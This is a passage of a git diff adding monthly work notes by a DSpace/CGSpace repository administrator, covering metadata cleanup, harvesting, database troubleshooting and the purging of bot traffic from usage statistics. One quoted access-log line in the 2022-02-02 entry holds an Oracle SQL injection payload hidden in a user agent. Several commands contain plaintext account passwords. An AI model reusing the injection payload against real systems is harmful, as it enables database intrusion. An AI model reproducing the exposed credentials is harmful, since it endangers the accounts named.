1:M 19 Dec 2021 19:27:15.585 * RDB age 33 seconds
1:M 19 Dec 2021 19:27:15.585 * RDB memory usage when created 3.17 Mb
1:M 19 Dec 2021 19:27:15.595 # Done loading RDB, keys loaded: 932, keys expired: 1.
1:M 19 Dec 2021 19:27:15.595 * DB loaded from disk: 0.011 seconds
1:M 19 Dec 2021 19:27:15.595 * Ready to accept connections
```
- The interface and harvesting all work as expected...
- I pushed the update to OpenRXV
- I also fixed the weird "unsafe" issue in the links on AReS that Abenet told me about last week
- When testing my local instance I realized that the `thumbnail` field was missing on the production AReS, and that somehow breaks the links
## 2021-12-22
- Fix apt error on DSpace servers due to updated `/etc/java-8-openjdk/security/java.security` file
## 2021-12-23
- Add support for dropping invalid AGROVOC subjects to csv-metadata-quality
- Move invalid AGROVOC subjects in Gaia's eighteen green cover items on DSpace Test to `cg.subject.system`
- I created an "approve" user for Rafael from CIAT to do tests on DSpace Test:
```console
$ dspace user -a -m rafael-approve@cgiar.org -g Rafael -s Rodriguez -p 'fuuuuuu'
```
## 2021-12-27
- Start a fresh harvest on AReS
## 2021-12-29
- Looking at the top IPs and user agents on CGSpace's Solr statistics I see a strange user agent:
```console
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.{random.randint(0, 9999)} Safari/537.{random.randint(0, 99)}
```
- I found two IPs using user agents with the "randint" bug:
- 47.252.80.214 (AliCloud in the US)
- 61.143.40.50 (ChinaNet in China)
- I wonder what other requests have been made from those hosts where the randint spoofer was working... ugh.
- I found some IPs from the Russian SELECTEL network making thousands of requests with SQL injection attempts...
- 45.134.26.171
- 45.146.166.173
- 3.225.28.105 is on Amazon and making thousands of requests for the same URL:
```console
/rest/collections/1118/items?expand=all&limit=1
```
- Most of the time it has a real-looking user agent, but sometimes it uses `Apache-HttpClient/4.3.4 (java 1.5)`
- Another 82.65.26.228 is doing SQL injection attempts from France
- 216.213.28.138 is some scrape-as-a-service bot from Sprious
- I used my `resolve-addresses-geoip2.py` script to get the ASNs for all the IPs in Solr stats this month, then extracted the ASNs that were responsible for more than one IP:
```console
$ ./ilri/resolve-addresses-geoip2.py -i /tmp/ips.txt -o /tmp/2021-12-29-ips.csv
$ csvcut -c asn /tmp/2021-12-29-ips.csv | sed 1d | sort | uniq -c | sort -h | awk '$1 > 1'
2 10620
2 265696
2 6147
2 9299
3 3269
5 16509
5 49505
9 24757
9 24940
9 64267
```
- AS 64267 is Sprious, and it has used these IPs this month:
- 216.213.28.136
- 207.182.27.191
- 216.41.235.187
- 216.41.232.169
- 216.41.235.186
- 52.124.19.190
- 216.213.28.138
- 216.41.234.163
- To be honest I want to ban all their networks but I'm afraid it's too many IPs... hmmm
- AS 24940 is Hetzner, but I don't feel like going through all the IPs to see... they always pretend to be normal users and make semi-sane requests so it might be a proxy or something
- AS 24757 is Ethiopian Telecom
- I'm going to purge all these for sure, as they are a scraping-as-a-service company and don't use proper user agents or request robots.txt
- AS 49505 is the Russian Selectel, and it has used these IPs this month:
- 45.146.166.173
- 45.134.26.171
- 45.146.164.123
- 45.155.205.231
- 195.54.167.122
- I will purge them all too because they are up to no good, as I already saw earlier today (SQL injections)
- AS 16509 is Amazon, and it has used these IPs this month:
- 18.135.23.223 (made requests using the `Mozilla/5.0 (compatible; U; Koha checkurl)` user agent, so I will purge it and add it to our DSpace user agent override and [submit to COUNTER-Robots](https://github.com/atmire/COUNTER-Robots/pull/51))
- 54.76.137.83 (made hundreds of requests to "/" with a normal user agent)
- 34.253.119.85 (made hundreds of requests to "/" with a normal user agent)
- 34.216.201.131 (made hundreds of requests to "/" with a normal user agent)
- 54.203.193.46 (made hundreds of requests to "/" with a normal user agent)
- I ran the script to purge spider agents with the latest updates:
```console
$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
Purging 2530 hits from HeadlessChrome in statistics
Purging 10676 hits from randint in statistics
Purging 3579 hits from Koha in statistics
Total number of bot hits purged: 16785
```
- Then the IPs:
```console
$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips-to-purge.txt -p
Purging 1190 hits from 216.213.28.136 in statistics
Purging 1128 hits from 207.182.27.191 in statistics
Purging 1095 hits from 216.41.235.187 in statistics
Purging 1087 hits from 216.41.232.169 in statistics
Purging 1011 hits from 216.41.235.186 in statistics
Purging 945 hits from 52.124.19.190 in statistics
Purging 933 hits from 216.213.28.138 in statistics
Purging 930 hits from 216.41.234.163 in statistics
Purging 4410 hits from 45.146.166.173 in statistics
Purging 2688 hits from 45.134.26.171 in statistics
Purging 1130 hits from 45.146.164.123 in statistics
Purging 536 hits from 45.155.205.231 in statistics
Purging 10676 hits from 195.54.167.122 in statistics
Purging 1350 hits from 54.76.137.83 in statistics
Purging 1240 hits from 34.253.119.85 in statistics
Purging 2879 hits from 34.216.201.131 in statistics
Purging 2909 hits from 54.203.193.46 in statistics
Purging 1822 hits from 2605\:b100\:316\:7f74\:8d67\:5860\:a9f3\:d87c in statistics
Total number of bot hits purged: 37959
```
<!-- vim: set sw=2 ts=2: -->

224
content/posts/2022-01.md Normal file
View File

@ -0,0 +1,224 @@
---
title: "January, 2022"
date: 2022-01-01T15:20:54+02:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2022-01-01
- Start a full harvest on AReS
<!--more-->
## 2022-01-06
- Add ORCID identifier for Chris Jones to CGSpace
- Also tag eighty-eight of his items in CGSpace:
```console
$ cat 2022-01-06-add-orcids.csv
dc.contributor.author,cg.creator.identifier
"Jones, Chris","Chris Jones: 0000-0001-9096-9728"
"Jones, Christopher S.","Chris Jones: 0000-0001-9096-9728"
$ ./ilri/add-orcid-identifiers-csv.py -i 2022-01-06-add-orcids.csv -db dspace63 -u dspacetest -p 'dom@in34sniper'
```
## 2022-01-09
- Validate and register CGSpace on [OpenArchives](https://www.openarchives.org/Register/ValidateSite?log=Z2V7WCT7)
- Last month IWMI colleagues were asking me to look into this, and after checking the OpenArchives mailing list it seems there was a problem on the server side
- Now it has worked and the message is "Successfully updated OAI registration database to status COMPLIANT."
- I received an email (as the Admin contact on our OAI) that says:
> Your repository has been registered in the OAI database of conforming repositories.
- Now I'm taking a screenshot of the validation page for posterity, because the logs seem to go away after some time
![OpenArchives.org registration](/cgspace-notes/2022/01/openarchives-registration.png)
- I tried to re-build the Docker image for OpenRXV and got an error in the backend:
```console
...
> openrxv-backend@0.0.1 build
> nest build
node_modules/@elastic/elasticsearch/api/types.d.ts:2454:13 - error TS2456: Type alias 'AggregationsAggregate' circularly references itself.
2454 export type AggregationsAggregate = AggregationsSingleBucketAggregate | AggregationsAutoDateHistogramAggregate | AggregationsFiltersAggregate | AggregationsSignificantTermsAggregate<any> | AggregationsTermsAggregate<any> | AggregationsBucketAggregate | AggregationsCompositeBucketAggregate | AggregationsMultiBucketAggregate<AggregationsBucket> | AggregationsMatrixStatsAggregate | AggregationsKeyedValueAggregate | AggregationsMetricAggregate
~~~~~~~~~~~~~~~~~~~~~
node_modules/@elastic/elasticsearch/api/types.d.ts:3209:13 - error TS2456: Type alias 'AggregationsSingleBucketAggregate' circularly references itself.
3209 export type AggregationsSingleBucketAggregate = AggregationsSingleBucketAggregateKeys
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Found 2 error(s).
```
- Ah, it seems the code on the server was slightly out of date
- I checked out the latest master branch and it built
## 2022-01-12
- Fix some citation formatting issues in Gaia's [eighteen CAS Green Cover publications on DSpace Test](https://dspacetest.cgiar.org/handle/10568/115230)
## 2022-01-19
- Francesca was having issues with a submission on CGSpace this week
- I checked and see a lot of locks in PostgreSQL:
```console
$ psql -c "SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid" | sort | uniq -c | sort -n
1
1 ------------------
1 (3506 rows)
1 application_name
9 psql
10
3487 dspaceWeb
```
- As before, I see messages from PostgreSQL about processes waiting for locks since I enabled the `log_lock_waits` setting last month:
```console
$ grep -E '^2022-01*' /var/log/postgresql/postgresql-10-main.log | grep -c 'still waiting for'
12
```
- I set a system alert on DSpace and then restarted the server
## 2022-01-20
- Abenet gave me a thumbs up for Gaia's eighteen CAS Green Cover items from last month
- I created a SimpleArchiveFormat bundle with SAFBuilder and then imported them on CGSpace:
```console
$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace import --add --eperson=aorth@mjanja.ch --source /tmp/SimpleArchiveFormat --mapfile=./2022-01-20-green-covers.map
```
## 2022-01-21
- Start working on the rest of the ~980 CGIAR TAC and ICW documents from Gaia
- I did some cleanups and standardization of author names
- I also noticed that a few dozen items had no dates at all, so I checked the PDFs and found dates for them in the text
- Otherwise all items have only a year, which is not great...
- Proof of concept upgrade of OpenRXV from Angular 9 to Angular 10
- I did some basic tests and created a [pull request](https://github.com/ilri/OpenRXV/pull/128)
## 2022-01-22
- Spend some time adding months to the CGIAR TAC and IWC records from Gaia
- Most of the PDFs have only YYYY, so this is annoying...
## 2022-01-23
- Finalize cleaning up the dates on the CGIAR TAC and IWC records from Gaia
- Rebuild AReS and start a fresh harvest
## 2022-01-25
- Help Udana from IWMI answer some questions about licenses on their journal articles
- I was surprised to see they have 921 total, but only about 200 have a `dcterms.license` field
- I updated about thirty manually, but really Udana should do more...
- Normalize the metadata `text_lang` attributes on CGSpace database:
```console
dspace=# SELECT DISTINCT text_lang, count(text_lang) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) GROUP BY text_lang ORDER BY count DESC;
text_lang | count
-----------+---------
en_US | 2803350
en | 6232
| 3200
fr | 2
vn | 2
92 | 1
sp | 1
| 0
(8 rows)
dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN ('en', '92', '');
UPDATE 9433
```
- Then export the WLE Journal Articles collection again so there are fewer columns to mess with
## 2022-01-26
- Send Gaia an example of the duplicate report for the first 200 TAC items to see what she thinks
## 2022-01-27
- Work on WLE's Journal Articles a bit more
- I realized that ~130 items have DOIs in their citation, but no `cg.identifier.doi` field
- I used this OpenRefine GREL to copy them:
```
cells['dcterms.bibliographicCitation[en_US]'].value.split("doi: ")[1]
```
- I also spent a bit of time cleaning up ILRI Journal Articles, but I notice that we don't put DOIs in the citation so it's not possible to fix items that are missing DOIs that way
- And I cleaned up and normalized some licenses
- Francesca from Bioversity was having issues with a submission on CGSpace again
- I looked at PostgreSQL and see an increasing number of locks:
```console
$ psql -c "SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid" | sort | uniq -c | sort -n
1
1 ------------------
1 (537 rows)
1 application_name
9 psql
51 dspaceApi
477 dspaceWeb
$ grep -E '^2022-01*' /var/log/postgresql/postgresql-10-main.log | grep -c 'still waiting for'
3
```
- I set a system alert on CGSpace and then restarted Tomcat and PostgreSQL
- The issue in Francesca's case was actually that someone had taken the task, not that PostgreSQL transactions were locked!
## 2022-01-28
- Finalize the last ~100 WLE Journal Article items without licensese and DOIs
- I did as many as I could, also updating http links to https for many journal links
- Federica Bottamedi contacted us from the system office to say that she took over for Vini (Abhilasha Vaid)
- She created an account on CGSpace and now we need to see which workflows she should belong to
- Start a fresh harvesting on AReS
- I adjusted the `check-duplicates.py` script to write the output to a CSV file including the id, both titles, both dates, and the handle link
- I included the id because I will need a unique field to join the resulting list of non-duplicates with the original CSV where the rest of the metadata and filenames are
- Since these items are not in DSpace yet, I generated simple numeric IDs in OpenRefine using this GREL transform: `row.index + 1`
- Then I ran `check-duplicates.py` on items 1200 and sent the resulting CSV to Gaia
- Delete one duplicate item I saw in IITA's Journal Articles that was uploaded earlier in WLE
- Also do some general cleanup on IITA's Journal Articles collection in OpenRefine
- Delete one duplicate item I saw in ILRI's Journal Articles collection
- Also do some general cleanup on ILRI's Journal Articles collection in OpenRefine and csv-metadata-quality
## 2022-01-29
- I did some more cleanup on the ILRI Journal Articles
- I added missing journal titles for items that had ISSNs
- Then I added pages for items that had them in the citation
- First, I faceted the citation field based on whether or not the item had something like ": 232-234" present:
```console
value.contains(/:\s?\d+(-|)\d+/)
```
- Then I faceted by blank on `dcterms.extent` and did a transform to extract the page information for over 1,000 items!
```console
'p. ' +
cells['dcterms.bibliographicCitation[en_US]'].value.match(/.*:\s?(\d+)(-|)(\d+).*/)[0] +
'-' +
cells['dcterms.bibliographicCitation[en_US]'].value.match(/.*:\s?(\d+)(-|)(\d+).*/)[2]
```
- Then I did similar for `cg.volume` and `cg.issue`, also based on the citation, for example to extract the "16" from "Journal of Blah 16(1)", where "16" is the second capture group in a zero-based match:
```console
cells['dcterms.bibliographicCitation[en_US]'].value.match(/.*( |;)(\d+)\((\d+)\).*/)[1]
```
- This was 3,000 items so I imported the changes on CGSpace 1,000 at a time...
<!-- vim: set sw=2 ts=2: -->

583
content/posts/2022-02.md Normal file
View File

@ -0,0 +1,583 @@
---
title: "February, 2022"
date: 2022-02-01T14:06:54+02:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2022-02-01
- Meeting with Peter and Abenet about CGSpace in the One CGIAR
- We agreed to buy $5,000 worth of credits from Atmire for future upgrades
- We agreed to move CRPs and non-CGIAR communities off the home page, as well as some other things for the CGIAR System Organization
- We agreed to make a Discovery facet for CGIAR Action Areas above the existing CGIAR Impact Areas one
- We agreed to try to do more alignment of affiliations/funders with ROR
<!--more-->
- I moved a bunch of communities:
```console
$ dspace community-filiator --remove --parent=10568/114639 --child=10568/115089
$ dspace community-filiator --remove --parent=10568/114639 --child=10568/115087
$ dspace community-filiator --remove --parent=10568/83389 --child=10568/108598
$ dspace community-filiator --remove --parent=10568/83389 --child=10947/1
$ dspace community-filiator --set --parent=10568/35697 --child=10568/80211
$ dspace community-filiator --remove --parent=10568/83389 --child=10947/2517
$ dspace community-filiator --set --parent=10568/97114 --child=10947/2517
$ dspace community-filiator --set --parent=10568/97114 --child=10568/89416
$ dspace community-filiator --set --parent=10568/97114 --child=10568/3530
$ dspace community-filiator --set --parent=10568/97114 --child=10568/80099
$ dspace community-filiator --set --parent=10568/97114 --child=10568/80100
$ dspace community-filiator --set --parent=10568/97114 --child=10568/34494
$ dspace community-filiator --set --parent=10568/117867 --child=10568/114644
$ dspace community-filiator --set --parent=10568/117867 --child=10568/16573
$ dspace community-filiator --set --parent=10568/117867 --child=10568/42211
$ dspace community-filiator --set --parent=10568/117865 --child=10568/109945
$ dspace community-filiator --set --parent=10568/117865 --child=10568/16498
$ dspace community-filiator --set --parent=10568/117865 --child=10568/99453
$ dspace community-filiator --set --parent=10568/117865 --child=10568/2983
$ dspace community-filiator --set --parent=10568/117865 --child=10568/133
$ dspace community-filiator --remove --parent=10568/83389 --child=10568/1208
$ dspace community-filiator --set --parent=10568/117865 --child=10568/1208
$ dspace community-filiator --remove --parent=10568/83389 --child=10568/56924
$ dspace community-filiator --set --parent=10568/117865 --child=10568/56924
$ dspace community-filiator --remove --parent=10568/83389 --child=10568/91688
$ dspace community-filiator --set --parent=10947/1 --child=10568/91688
$ dspace community-filiator --remove --parent=10568/83389 --child=10947/2515
$ dspace community-filiator --set --parent=10947/1 --child=10947/2515
```
- Remove CPWF and CTA subjects from the Discovery facets
- Start a full Discovery index on CGSpace:
```console
$ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
real 275m15.777s
user 182m52.171s
sys 2m51.573s
```
- I got a request to confirm validation of CGSpace on openarchives.org, with the requestor's IP being 128.84.116.66
- That is at Cornell... hmmmm who could that be?!
- Oh, the OpenArchives initiative is at Cornell... maybe this is an automated periodic check?
## 2022-02-02
- Looking at the top user agents and IP addresses in CGSpace's Solr statistics for 2022-01
- 64.39.98.40 made 26,000 requests, owned by Qualys so it's some kind of security scanning
- 45.134.26.171 made 8,000 requests and it's own by some Russian company and makes requests like this hmmmmm:
```console
45.134.26.171 - - [12/Jan/2022:06:25:27 +0100] "GET /bitstream/handle/10568/81964/varietal-2faea58f.pdf?sequence=1 HTTP/1.1" 200 1157807 "https://cgspace.cgiar.org:443/bitstream/handle/10568/81964/varietal-2faea58f.pdf" "Opera/9.64 (Windows NT 6.1; U; MRA 5.5 (build 02842); ru) Presto/2.1.1)) AND 4734=CTXSYS.DRITHSX.SN(4734,(CHR(113)||CHR(120)||CHR(120)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (4734=4734) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(120)||CHR(113)||CHR(122)||CHR(113))) AND ((3917=3917"
```
- 3.225.28.105 made 3,000 requests mostly for one CIAT collection on the REST API and it is owned by Amazon
- The user agent is sometimes a normal user one, and sometimes `Apache-HttpClient/4.3.4 (java 1.5)`
- 217.182.21.193 made 2,400 requests and is on OVH
- I purged these hits
```console
$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt -p
Purging 26817 hits from 64.39.98.40 in statistics
Purging 9446 hits from 45.134.26.171 in statistics
Purging 6490 hits from 3.225.28.105 in statistics
Purging 11949 hits from 217.182.21.193 in statistics
Total number of bot hits purged: 54702
```
- Export donors and affiliations from CGSpace database:
```console
localhost/dspace63= ☘ \COPY (SELECT DISTINCT text_value as "cg.contributor.donor", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 248 GROUP BY text_value ORDER BY count DESC) to /tmp/2022-02-02-donors.csv WITH CSV HEADER;
COPY 1036
localhost/dspace63= ☘ \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2022-02-02-affiliations.csv WITH CSV HEADER;
COPY 7901
```
- Then check matches against the latest ROR dump:
```console
$ csvcut -c cg.contributor.donor /tmp/2022-02-02-donors.csv | sed '1d' > /tmp/2022-02-02-donors.txt
$ ./ilri/ror-lookup.py -i /tmp/2022-02-02-donors.txt -r 2021-09-23-ror-data.json -o /tmp/donor-ror-matches.csv
...
```
- I see we have 258/1036 (24.9%) of our donors matching ROR (as of the 2021-09-23 ROR dump)
- I see we have 1986/7901 (25.1%) of our affiliations matching ROR (as of the 2021-09-23 ROR dump)
- Update the PostgreSQL JDBC driver to 42.3.2 in the Ansible Infrastructure playbooks and deploy on DSpace Test
- Mishell from CIP sent me a copy of a security scan their ICT had done on CGSpace using QualysGuard
- The report was very long and generic, highlighting low-severity things like being able to post crap to search forms and have it appear on the results page
- Also they say we're using old jQuery and bootstrap, etc (fair enough) but there are no exploits per se
- At least now I know why all those Qualys IPs are scanning us all the time!!!
- Mishell also said she's having issues logging into CGSpace
- According to the logs her account is failing on LDAP authentication
- I checked CGSpace's LDAP credentials using ldapsearch and was able to connect so it's gotta be something with her account
## 2022-02-03
- I synchronized DSpace Test with a fresh snapshot of CGSpace
- I noticed a bunch of thumbnails missing for items submitted in the last week on CGSpace so I ran the `dspace filter-media` script manually and eventually it crashed:
```console
$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace filter-media
...
SKIPPED: bitstream 48612de7-eec5-4990-8f1b-589a87219a39 (item: 10568/67391) because 'ilri_establishiment.pdf.txt' already exists
Generated Thumbnail ilri_establishiment.pdf matches pattern and is replacable.
SKIPPED: bitstream 48612de7-eec5-4990-8f1b-589a87219a39 (item: 10568/67391) because 'ilri_establishiment.pdf.jpg' already exists
File: Agreement_on_the_Estab_of_ILRI.doc.txt
Exception: org.apache.poi.util.LittleEndian.getUnsignedByte([BI)I
java.lang.NoSuchMethodError: org.apache.poi.util.LittleEndian.getUnsignedByte([BI)I
at org.textmining.extraction.word.model.FormattedDiskPage.<init>(FormattedDiskPage.java:66)
at org.textmining.extraction.word.model.CHPFormattedDiskPage.<init>(CHPFormattedDiskPage.java:62)
at org.textmining.extraction.word.model.CHPBinTable.<init>(CHPBinTable.java:70)
at org.textmining.extraction.word.Word97TextExtractor.getText(Word97TextExtractor.java:122)
at org.textmining.extraction.word.Word97TextExtractor.getText(Word97TextExtractor.java:63)
at org.dspace.app.mediafilter.WordFilter.getDestinationStream(WordFilter.java:83)
at com.atmire.dspace.app.mediafilter.AtmireMediaFilter.processBitstream(AtmireMediaFilter.java:103)
at com.atmire.dspace.app.mediafilter.AtmireMediaFilterServiceImpl.filterBitstream(AtmireMediaFilterServiceImpl.java:61)
at org.dspace.app.mediafilter.MediaFilterServiceImpl.filterItem(MediaFilterServiceImpl.java:181)
at org.dspace.app.mediafilter.MediaFilterServiceImpl.applyFiltersItem(MediaFilterServiceImpl.java:159)
at org.dspace.app.mediafilter.MediaFilterServiceImpl.applyFiltersAllItems(MediaFilterServiceImpl.java:111)
at org.dspace.app.mediafilter.MediaFilterCLITool.main(MediaFilterCLITool.java:212)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
```
- I should look up that issue and report a bug somewhere perhaps, but for now I just forced the JPG thumbnails with:
```console
$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace filter-media -p "ImageMagick PDF Thumbnail" -v >& /tmp/filter-media.log
```
## 2022-02-04
- I found a thread on the dspace-tech mailing list about the `media-filter` crash above
- The problem is that the default filter for Word files is outdated, so we need to switch to the PoiWordFilter extractor
- After changing that I was able to filter the Word file on that item above:
```console
$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace filter-media -i 10568/67391 -p "Word Text Extractor" -v
The following MediaFilters are enabled:
Full Filter Name: org.dspace.app.mediafilter.PoiWordFilter
org.dspace.app.mediafilter.PoiWordFilter
File: Agreement_on_the_Estab_of_ILRI.doc.txt
FILTERED: bitstream 31db7d05-5369-4309-adeb-3b888c80b73d (item: 10568/67391) and created 'Agreement_on_the_Estab_of_ILRI.doc.txt'
```
- Meeting with the repositories working group to discuss issues moving forward in the One CGIAR
## 2022-02-07
- Gaia sent me her feedback on the duplicates for the TAC and ICW items for CGSpace a few days ago
- I used the IDs marked "delete" in her spreadsheet to create a custom text facet with this GREL in OpenRefine:
```console
or(
isNotNull(value.match('1')),
isNotNull(value.match('4')),
isNotNull(value.match('5')),
isNotNull(value.match('6')),
isNotNull(value.match('8')),
...
sNotNull(value.match('178')),
isNotNull(value.match('186')),
isNotNull(value.match('188')),
isNotNull(value.match('189')),
isNotNull(value.match('197'))
)
```
- Then I flagged all of these (seventy-five items)...
- I decided to flag the deletes instead of star the keeps because there are some items in the original file that we not marked as duplicates so we have to keep those too
- I generated the next batch of 200 items, from IDs 201 to 400, checked them for duplicates, and then added the PDF file names to the CSV for reference:
```console
$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-01-21-CGSpace-TAC-ICW-batch201-400.csv > /tmp/tac.csv
$ ./ilri/check-duplicates.py -i /tmp/tac.csv -db dspace63 -u dspacetest -p 'dom@in34sniper' -o /tmp/2022-02-07-tac-batch2-201-400.csv
$ csvcut -c id,filename ~/Downloads/2022-01-21-CGSpace-TAC-ICW-batch201-400.csv > /tmp/batch2-filenames.csv
$ csvjoin -c id /tmp/2022-02-07-tac-batch2-201-400.csv /tmp/batch2-filenames.csv > /tmp/2022-02-07-tac-batch2-201-400-filenames.csv
```
- Then I sent this second batch of items to Gaia to look at
## 2022-02-08
- Create a SAF archive for the first 200 items (IDs 1 to 200) that were *not* flagged as duplicates and upload them to a [new collection on DSpace Test](https://dspacetest.cgiar.org/handle/10568/117921):
```console
$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace import --add --eperson=bngo@mfin.com --source /tmp/SimpleArchiveFormat --mapfile=./2022-02-08-tac-batch1-1to200.map
```
- Fix some occurrences of "Hammond, Jim" to be "Hammond, James" on CGSpace
- Start a full index on AReS
## 2022-02-09
- UptimeRobot said that CGSpace was down yesterday evening, but when I looked it was up and I didn't see a high database load or anything wrong
- Maria from Bioversity wrote to say that CGSpace was very slow also...
## 2022-02-10
- Looking at the Munin graphs on CGSpace I see several metrics showing that there was likely just increased load...
![Firewall packets day](/cgspace-notes/2022/02/fw_packets-day-fs8.png)
![DSpace sessions day](/cgspace-notes/2022/02/jmx_dspace_sessions-day-fs8.png)
![Tomcat pool day](/cgspace-notes/2022/02/jmx_tomcat_dbpools-day-fs8.png)
![PostgreSQL connections day](/cgspace-notes/2022/02/postgres_connections_db-day-fs8.png)
- I extract the logs from nginx for yesterday so I can analyze the traffic:
```console
# zcat --force /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep '09/Feb/2022' > /tmp/feb9-access.log
# zcat --force /var/log/nginx/rest.log.1 /var/log/nginx/rest.log.2.gz | grep '09/Feb/2022' > /tmp/feb9-rest.log
# awk '{print $1}' /tmp/feb9-* | less | sort -u > /tmp/feb9-ips.txt
# wc -l /tmp/feb9-ips.txt
11636 /tmp/feb9-ips.tx
```
- I started resolving them with my `resolve-addresses-geoip2.py` script
- In the mean time I am looking at the requests and I see a new user agent: `1science Resolver 1.0.0`
- Seems to be a defunct project from Elsevier (website down, Twitter account inactive since 2020)
- I also see 3,400 requests from `EyeMonIT_bot_version_0.1_(http://www.eyemon.it/)`, but because it has "bot" in the name it gets heavily throttled...
- I wonder who is monitoring CGSpace with that service...
- Looking at the top twenty or so ASNs for the resolved IPs I see lots of bot traffic, but nothing malicious:
```console
$ csvcut -c asn /tmp/feb9-ips.csv | sort | uniq -c | sort -h | tail -n 20
79 24940
89 36908
100 9299
107 2635
110 44546
111 16509
118 7552
120 4837
123 50245
123 55836
147 45899
173 33771
192 39832
202 32934
235 29465
260 15169
466 14618
607 24757
768 714
1214 8075
```
- The same information, but by org name:
```console
$ csvcut -c org /tmp/feb9-ips.csv | sort | uniq -c | sort -h | tail -n 20
92 Orange
100 Hetzner Online GmbH
100 Philippine Long Distance Telephone Company
107 AUTOMATTIC
110 ALFA TELECOM s.r.o.
111 AMAZON-02
118 Viettel Group
120 CHINA UNICOM China169 Backbone
123 Reliance Jio Infocomm Limited
123 Serverel Inc.
147 VNPT Corp
173 SAFARICOM-LIMITED
192 Opera Software AS
202 FACEBOOK
235 MTN NIGERIA Communication limited
260 GOOGLE
466 AMAZON-AES
607 Ethiopian Telecommunication Corporation
768 APPLE-ENGINEERING
1214 MICROSOFT-CORP-MSN-AS-BLOCK
```
- Most of these are pretty normal except "Serverel" and Hetzner perhaps, but their user agents are pretending to be normal users so who knows...
- I decided to look in the Solr stats with `facet.limit=1000&facet.mincount=1` and found a few more definitely non-human agents:
- scalaj-http/2.4.2
- scpitspi-rs
- lua-resty-http
- AHC/2.1
- acebookexternalhit <---- typo, but purge it!!!
- Iframely/1.3.1 (+https://iframely.com/docs/about) Atlassian
- qbhttp/1.0.0
- got (https://github.com/sindresorhus/got)
- colly - https://github.com/gocolly/colly/v2
- article-parser/4.2.10
- SomeRandomText
- adreview/1.0
- I added them to the ILRI override in the DSpace spider list and ran the `check-spider-hits.sh` script:
```console
$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
Purging 234 hits from randint in statistics
Purging 337 hits from Koha in statistics
Purging 1164 hits from scalaj-http in statistics
Purging 1528 hits from scpitspi-rs in statistics
Purging 3050 hits from lua-resty-http in statistics
Purging 1683 hits from AHC in statistics
Purging 1129 hits from acebookexternalhit in statistics
Purging 534 hits from Iframely in statistics
Purging 1022 hits from qbhttp in statistics
Purging 330 hits from ^got in statistics
Purging 156 hits from ^colly in statistics
Purging 38 hits from article-parser in statistics
Purging 1148 hits from SomeRandomText in statistics
Purging 3126 hits from adreview in statistics
Purging 217 hits from 1science in statistics
Total number of bot hits purged: 14696
```
- I don't have time right now to add any of these to the COUNTER-Robots list...
- Peter asked me to add a new item type on CGSpace: Opinion Piece
- Map an item on CGSpace for Maria since she couldn't find it in the item mapper
## 2022-02-11
- CGSpace is slow and the load has been over 400% for a few hours
- The number of DSpace sessions seems normal, even lower than a few days ago
- The number of PostgreSQL connections is low, but I see there are lots of "AccessShare" locks (green on Munin, not blue like usual)
- I will run all system updates, copy the latest config changes, and restart the server
## 2022-02-12
- Install PostgreSQL 12 on my local dev environment to starting DSpace 6.x workflows with it:
```console
$ podman run --name dspacedb -v dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:12-alpine
$ createuser -h localhost -p 5432 -U postgres --pwprompt dspacetest
$ createdb -h localhost -p 5432 -U postgres -O dspacetest --encoding=UNICODE dspacetest
$ psql -h localhost -U postgres -c 'ALTER USER dspacetest SUPERUSER;'
$ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost ~/Downloads/dspace-2022-02-12.backup
$ psql -h localhost -U postgres -c 'ALTER USER dspacetest NOSUPERUSER;'
```
- Eventually I will updated DSpace Test, then CGSpace (time to start paying off some technical debt!)
- Start a full Discovery re-index on CGSpace:
```console
$ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
real 292m49.263s
user 201m26.097s
sys 3m2.459s
```
- Start a full harvest on AReS
## 2022-02-14
- Last week Gaia sent me her notes on the second batch of TAC/ICW documents (items 201400 in the spreadsheet)
- I created a filter in LibreOffice and selected the IDs for items with the action "delete", then I created a custom text facet in OpenRefine with this GREL:
```
or(
isNotNull(value.match('201')),
isNotNull(value.match('203')),
isNotNull(value.match('209')),
isNotNull(value.match('209')),
isNotNull(value.match('215')),
isNotNull(value.match('220')),
isNotNull(value.match('225')),
isNotNull(value.match('226')),
